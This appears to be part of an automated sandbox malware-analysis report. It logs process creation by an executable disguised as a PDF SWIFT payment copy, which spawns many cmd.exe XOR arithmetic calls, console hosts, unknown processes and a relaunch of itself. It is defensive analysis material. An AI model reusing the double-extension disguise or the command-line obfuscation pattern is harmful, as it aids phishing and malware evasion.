          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
